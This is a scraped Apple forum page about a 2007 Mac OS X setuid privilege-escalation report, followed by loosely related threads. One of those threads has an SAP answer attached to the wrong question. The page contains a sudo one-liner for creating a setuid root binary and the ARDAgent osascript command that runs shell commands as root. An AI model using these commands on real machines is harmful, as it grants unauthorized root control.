Mac OS X Local Privilege Escalation Vulnerabilities

Yes this has happened to me
I found out about it on this site:
http://projects.info-pull.com/moab/MOAB-15-01-2007.html
It effects desk utility.
If you have the below when you check you disk permissions
Determining correct file permissions.
Group differs on ./Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool, should be 80, group is 0
Group differs on ./Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy, should be 80, group is 0
Group differs on ./Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool, should be 80, group is 0
There is a work around but I am not sure if I know how to do it. Can any one write me a step by step guide. IE open terminal cd into so & so that sort of thing. Also is their work around sound or just some other vulnerabilities.
Please check out the link before answering.
Thanks in advance
PS Am I worried no not really we can only learn from these things

This "exploit" or whatever you want to call it is absolutely ridiculous, in my opinion.
"Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid)."
The file at "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool" is indeed a SetUID root helper tool which the Activity Monitor uses. It's owner is root, with a group of admin. Its parent folder is owned by root with a group of admin.
A "Standard" non-privileged user, or in other words, a user for whom the "Allow user to administer this computer" checkbox isn't checked in System Preferences, cannot do anything to alter the pmTool. When that checkbox is enabled, the user is part of the "admin" group. Since the pmTool is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user can do nothing to alter it. Since the parent directory, /Applications/Utilities/Activity Monitor.app/Contents/Resources/, is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user cannot remove, add, or replace the contents, including the "pmTool".
So what's left of this "exploit" is that a user that's an administrator could replace or modify the pmTool and use Disk Utility's Repair Permissions feature to "blindly" turn this malicious replacement executable into a SetUID root tool. They could then use this tool to wreak havoc on the system.
My only comments are:
1) Duh.
2) Why the heck would you want to go through this convoluted procedure just to create a (malicious?) SetUID root executable? If you're an admin, there are much simpler methods available.
If a user is an administrator, all they need to do to create a SetUID root tool is enter the following in the Terminal:
sudo chmod 4755 /Users/mdouma46/Desktop/myMaliciousSetUIDTool; sudo chown 0:0 /Users/mdouma46/Desktop/myMaliciousSetUIDTool
Just as effective, without all the convoluted "psuedo-exploit" stuff.
So, where exactly is the exploit now?
Dual 2.7GHz PowerPC G5 w/ 2.5 GB RAM; 17" MacBook Pro w/ 2 GB RAM - Mac OS X (10.4.8)

Similar Messages

Local Privilege Escalation via ARD

Slashdot has an interesting topic...
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
Will print "root" and indeed evil things can be done by replacing
"whoami" with a suitable command.
The ARDAgent executable is suid'ed to root!
Jerry

Still no worky for me
(spartan) ~ % bash
bash-3.2$ while : ; do osascript -e 'tell application "ARDAgent" to do shell script "id"'; done
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
...

AUDIT action (create, delete, privilege escalation, set and change password from users account and group) users and admins in Solaris 10

Hello.
in Solaris 10 i need auditing process create, delete, privilege escalation, set and change password and etc... from users account and group.
I set settings:
in file syslog.conf:
*.info;mail.none;cron.none;audit.notice            @IP-Remote-syslog-server-SIEM
in file   /etc/security/audit_control:
dir:/var/audit
flags:lo,ad,ex,cc,am,no,fc,fd
minfree:20
naflags:lo
plugin:name=audit_syslog.so;p_flags=lo,ad,ex,cc,am,no
in file   /etc/security/audit_user:
root:lo,ad:no
Now I see in the logs only the fact of a connection via SSH and run processes on behalf of users. Creation. delete users, change passwords for some reason do not is logged.
Many users. For each individual write permissions in the file /etc/security/audit_user not possible, it is likely to forget any new user (or there is a possibility in this file one line to describe the audits for all accounts?)
Where is the mistake?

You are most likely hitting Bug 15779000 user/role/groupadd/mod/del don't audit their use.
And the fix is only available in S11.2.
-- Renaud

Getting the MAC address of local computer

Hello developers! Can you to tell me how I can to get a MAC address of local computer in Java, JDK 1.4.0????
Thank you!

Hi,
There isn't a particular method you can call. However check out this thread.
http://forum.java.sun.com/thread.jsp?forum=4&thread=239391
This has sample code to get the MAC address on Windows.
Regards,
Roopasri Vittal
Developer Technical Support
Sun Microsystems
http://sun.com/developers/support

Adobe Reader XI privilege escalation

...I know, this is not really a privilege escalation in the classical way...
Hi.
With both the current versions of Adobe Reader X and XI, standard users are able to repair adobe reader going via appwiz.cpl/control panel.
Problem is: if reader is opened, Windows needs to restart to finish repairing...problem is, even if standard users are NOT allowed to restart the computer (think of terminal servers with dozens of clients logged on), they MAY restart the server, causing real trouble. So even with GPOs in place that deny standard users the privilege to shutdown/restart the computer, buggy Adobe Reader makes it possible.
Side note: while UAC will prompt users to supply admin credentials when trying to uninstall Adobe Reader, it does not prompt when trying to repair. That's the bug.
Tested on win8/server 2012, Server 2008 R2. Adobe Reader 11.0.3/10.1.7

http://www.adobe.com/devnet/reader.html
You may want to check with the dev people about the shut down and how to disable it, this being a user-to-user forum, and not often frequented by development personnel. I'm sure there's a simple code change that will disable it, however, without the restart, the repair becomes useless as Reader cannot repoen until the proper reg keys and dll files are amended per the repair, but then you already know that.
There may also be a code change to enable UAC for repairs. My understanding is that an uninstall may remove shared files, and that's the parameter for Windows to prompt with UAC. but the repair only changes installed files using existing files, so Windows doesn't see that as a potential for damage.

After Effect cs4 cannot render jpg on network on mac but render locally okay

After Effect cs4 cannot render jpg on network on mac but render locally okay
We use intel mac pro as workstation, and our servers are windows 2003 servers.
After Effect cs4 H264 render on network without any problem bud jpeg not.
Thank You
Ayhan.

Perhaps you must just enable the Allow Encoding using Legacy CoDecs option in the Quicktime control panel on the network machine or else some of that may not show up. Of course make sure QT is installed correctly in teh first place, as Todd and Rick said. On a server, you may need to set special group policies for that to work, also.
Mylenium

UNpatched Windows Privilege Escalation Vulnerability + Flash exploits

The following has been copied/pasted from http://secunia.com/advisories/64146/ (which, while free, requires registration to view):
A [0-day] vulnerability has been reported in Microsoft Windows, which can be exploited by malicious, local users to gain escalated privileges.
The vulnerability is caused due to an unspecified error. No further information is currently available.
Note: Reportedly, the vulnerability is being currently exploited in limited, targeted attacks .
=====================================================================
The following has been copied/pasted from https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
FireEye Labs recently detected a limited APT campaign exploiting [a combination of] zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows...
While there is not yet a patch available for the Windows vulnerability, updating Adobe Flash to the latest version [17.0.0.169] will render this in-the-wild exploit innocuous.
It is therefore prudent for anyone who has not updated an older Flash (<=17.0.0.134) do so expeditiously.
===================================
EDIT: (With acknowledgement to "Puppy" at the Lenovo Forum)
It seems that even the newest version of Flash (x.169) is no longer secure:
On April 14th 2015, Adobe patched CVE-2015-0359 in APSB15-06. On April 17th, just 3 days later, a new version of the Angler Exploit Kit (EK) was released that targets the patched vulnerability.
https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html

Hi colbabomb, I rarely visit sites that use QuickTime (e.g., Apple). The problem pages used Flash (such as the page with the video of last Monday's SuMo meeting).

How do I setup CalDav and CardDav servers on my Mac to enable local 'cloud' syncing in Mavericks

I've decided to start off a new thread having initially posted on How to locally sync an iPhone with OS X Mavericks? iCloud is NOT an option.
It is clear to me that it is possible to establish syncing locally without going outside one's own home, and without internet access. I am bugged by the fact that the previous service has gone without any user focussed warning, but I am keen to find a way of solving the problem. If you are just frustrated, I'd be grateful if you can keep your annoyance off this thread.
My guess is that a CalDav and CardDav server hosted on my own Mac can be set upt to sync with my iPhone (3GS) either on a Computer-to-Computer (ad hoc) network or via my own home LAN. The trouble is I am not network/Apache savvy enough to use it.
I am reluctant to fork out an additional amount for the Mavericks server as I don't have any other foreseeable need for it, but Mavericks comes with Apache pre-loaded and there is a very light, simple and free open source CalDav and CardDav server in Baïkal. The trouble is I am not apache/network savvy enough to make use of it, and basically I am stumbling along in the near dark with terminal.
There are some good resources for setting up Apache and for setting up Virtual Hosts which would host my personal 'cloud', and Baïkal also comes with setup guides as well. The trouble is, I don't quite have enough knowledge to marry the two together. Is there anyone contributing to or watching this thread who has the know-how to do a proper step by step guide for running Baïkal on Apache as installed in the Mavericks OS, and setting up a local 'cloud'.
AFAICT the problem with the resources I have found is that the Apache stuff I've found doesn't particularly focus on running Baïkal, and the Baïkal documentation is not specific to Apache on Mavericks. Is there anyone out there who can give me some help with this?
Can anyone help - please?

I've now downloaded ownCloud 4.5.13 and followed the installation instructions in the Administrators Manual. I am slightly concerned to read under MacOS: "This section of the manual needs to be revised."
However, I have followed the instructions there, and step 5 has taken me to the web setup page where I have created an account with user name and password.
Then I went to Calendar, and from the Calendar menu chose Add Account… In the dialog that followed I chose Add CalDAV Account. I chose Account Type Manual and put in the username and password I used when setting up the ownCloud account. For the URL I followed the manual and put: http://ADDRESS/remote.php/caldav/principals/username/ substituing 'localhost:8888/ownCloud' for the address, and my ownCloud username for the username. (If I just used 'localhost:8888' for the address it produced the message: "The URL http://localhost:8888/remote.php/caldav/principals/[myusername]/ encountered HTTP error 404. Make sure the URL is correct.".)
So far I am semi-sucessful. It has created a Http://Localhost:8888/Owncloud account on Calendar in which I have been able to creat a test calendar and an event. I have also deleted the event, but Calendar will not let me delete the calendar. Once I inserted a second calendar the Delete command became available, but failed with this notice: "http://localhost:8888/ownCloud/remote.php/caldav/principals/[myusername]/ is not a location that supports this request." A retry deleted the name of the calendar, but left it otherwise intact. The account now has a grey triangle next to it which when clicked produces the following: "The request (CalDAVCalendarSplitDualTypeCalendarQueueableOperation) for account “Http://Localhost:8888/Owncloud/Remote” failed."
I think this may be resolved by an ownCloud setting. I will see if I can track this down. Has anyone here got any thoughts?
[I'm sorry I seem to be unable to prevent the editor from creating clickable links from the URLs I am posting]
Message was edited by: James Richards

On Mac OSX open local files in a new Tab instead of a new Window

on my Mac Book Pro OSX 10.6 both FF3. and FF6. does not open new tab for links on local files(file:///) but new window instead.
FF3 and FF6 does open new Tabs for external url (http://)
My FF preferences are set to 'new tab always".
I tried some "browser.links." prperties in "about:config"
I tried also "Tabs Mix Pluos" extension.
With no change.
Note:
* FF3.6 was doing the same thing on my (past) Mac G4
* Safari, Chrome, Opera do the right thing (open new tab) on the same Mac and files.
* FF3.6 and FF6 do the right thing (open new tab) on my PC window XP

You can look at the browser.link.open_newwindow prefs on the about:config page.
* http://kb.mozillazine.org/browser.link.open_newwindow.restriction (0)
* http://kb.mozillazine.org/browser.link.open_newwindow (3)
To open the about:config page, type about:config in the location (address) bar and press the "Enter" key, just like you type the url of a website to open a website. 
If you see a warning then you can confirm that you want to access that page. 
*Use the Filter bar at to top of the about:config page to locate a preference more easily.
*Preferences that have been modified show as bold(user set).
*Preferences can be reset to the default or changed via the right-click context menu.

Mac to PC local connection

I want to connect my mac(10.9.4) and pc(win 8.1) using a personal hotspot type of a network ...
I don't want to share the internet, i just want to create a local network to share data and media...
I tried to use "create network" on the mac, but the network that is created is not detected by the windows pc ...
Is there a way to detect the network, or any other applicaftion on mac that could perform this task ... please help ..!!!

Hi bhargav17,
It sounds like you are having issues with your PC being unable to join a network created by your Mac. The following article gives instructions on how to set up the wireless network from your Mac -
OS X Mavericks: Create a computer-to-computer network
http://support.apple.com/kb/PH13796
If that does not work, you may want to connect the computers using an Ethernet cable instead of wirelessly.
Once either of these is working you can set up file sharing to work using the following article -
OS X: How to connect with File Sharing using SMB
http://support.apple.com/kb/HT5884
Or you can have the Mac connect to shared volumes on the PC -
OS X Mavericks: Connect to shared computers and file servers on a network
http://support.apple.com/kb/PH13779
Thanks for using Apple Support Communities.
Best,
Brett L

Should I ok "this computer's local hostname Irma-Mac-mini-local" is already in use on this network. The name has been changed to Irma2 Mac-mini 2-local

Should I ok this message-this computer's local hostname Irma's Mac-mini-local is already in use on this network. The name has been changed to Irma's Mac-mini-2local

Don't think this is a conflict with IP Addresses or computer names
= DHCP hangover when computer renews DHCP lease
There is no actual other computer
It just appears that way when reconnects so creates new -2 computer name
What types of names do you use your computers ?
Whether you name them after quantum particles or the romantic poets...
They will each start to be appended with "-2" then "-3" etc if you auto configure network settings from Airport Router DHCP service and you have this Change computer name issue where pop up window states name is already being used on your LAN
As stated previous post you can reset the computer name in SysPrefs / Sharing / Edit button
And restart Router or renew all DHCP leases (if persists in not allowing original name)
Can now press Edit and reset name of choice
But for Fix see link above

Time machine backups: Size of Mac HD Backup vs Mac HD on local machine

Hello,
Today I used Time Machine to backup the computer. It completed the backup and now I want to *make sure* that the backup files and the local machine files are the same size; don't want to leave anything up to some program when so much is at stake.
The problem: On the External HD, the size of the account I *MUST* have backed up is 20Gb. When I look at the /Volumes/Mac HD/Users/##### I see the user account as being 45GB.
I'm pretty sure that Time Machine doesn't compress any of the files. I am also aware of the changing nature of ~/Library and other similar files.
What is going on here? Can I be sure that my backups are truly complete backups?
Other than looking at the folder size, how can I really know what the actual size is?
Any info would be great.
Thanks,
Allan

There is a wealth of Time Machine information here:
http://pondini.org/OSX/Home.html
AC

Message application between Macs on internal local network

I’m looking for an application that will allow interchange of short messages (copy/pasteable) between Macs on my home network via Ethernet/router/Airport. At the moment, I use email.

You can use iChat via Bonjour on your local network to communicate in much the same fashion as you'd use it via internet based services. I even found a nice short video demonstrating the ease of setup:
http://video.google.com/videoplay?docid=-988717806037213326#

Mac accounts for local sharing are hidden?

Hi,
I created a mac os account only for sharing music in the local network (in german it's a »Nur Freigabe«-account). Everything worked nice, the account »macmusik« got access to my music folders, I activated »smb« for windows and it worked.
Since I don't know this account »macmusik« isn't in the user control panel anymore (screenshot no. 1). But the account still exist (screenshot no. 2).
Where can I find it?
Julian

Hello Kevin,
the report RPRFIN00_40 which transfer the Settlement results to FI (not posting) has an user-Exit (Include RPREX010) with two form routines
EXB706K User-Form vor dem Lesen der T706K /before reading tabel T706K
and
EXA706K User-Form nach dem Lesen der T706K/after reading.
Both routines has Parameters PTRV_HEAD.
In PTRV_HEAD you will find the Chosen trip scheme and ZLAND (ZLAND = main travel destination Country)
So if you program Routine after reading the T706K table EXA706K in following way
Rough example for countryversion e.g. Germany
If p_wa-head-molga = '01' (Germany)
If p_wa__head-schem = '02' (international)
IF p_kont1 = '+20' (only the 'meal per diem account' should be changed)
p_kont1= '+99' (instead of +20) (Fantasy account 99 must be maintained in ta PRT3 HRT too)
ENDIF.
ENDIF.
ENDIF.
...Something like this.
Alternative you can use ptrv_head-ZLAND like the non-active example in the user-Exit: f p_wa_head-zland ne t001-land1.
I haven't try this-out but it's maybe helpful.
Best regards
Klaus

Browsing for other Macs on same Local Area Network

I have two Macs both with Appletalk turned on and both connected to a local area network. The router hands out IP addresses, i.e. they are not fixed. I would like to either browse for one computer from the other or enter the NAME of the other computer and have it located. I carefully check the other computer to determine its name and enter it in the "Connect to Server" and it isn't found. I try browsing and it doesn't show anything except a applications/Library/User folders in "network" None of there are on the other computer.
I have to log onto the other computer, look up its current IP address, then enter it on the one I want to connect from.
It should be possible to locate other computers that have sharing turned on.
What do I do to make this happen either automatically or when I browse. Even Windooze can locate other windooze machines on the same network!

I imagine you've already done this, but when you copy the computer's name, you changed the spaces to dashes, right?
If this is the Computer Name as listed in "Sharing":
My Isolated Mac
When you connect to server (apple-K), you type this for the "server address":
My-Isolated-Mac
I've had this problem with the Network Browser too. Today in fact. Sometimes the "Network" item in the left column of a Finder window wil have a tiny "eject" icon beside it, and when you select Network, you get a list of everybody available. Sometimes you don't see the icon, and when you select Network, I just see three empty folders. I haven't figured out why, but when I did "Connect to Server" and typed the Bonjour name of one of the computers on the network, I connected and everything seemed to work again. Hmmm...
Good luck.

Mac OS X Local Privilege Escalation Vulnerabilities

Similar Messages

Maybe you are looking for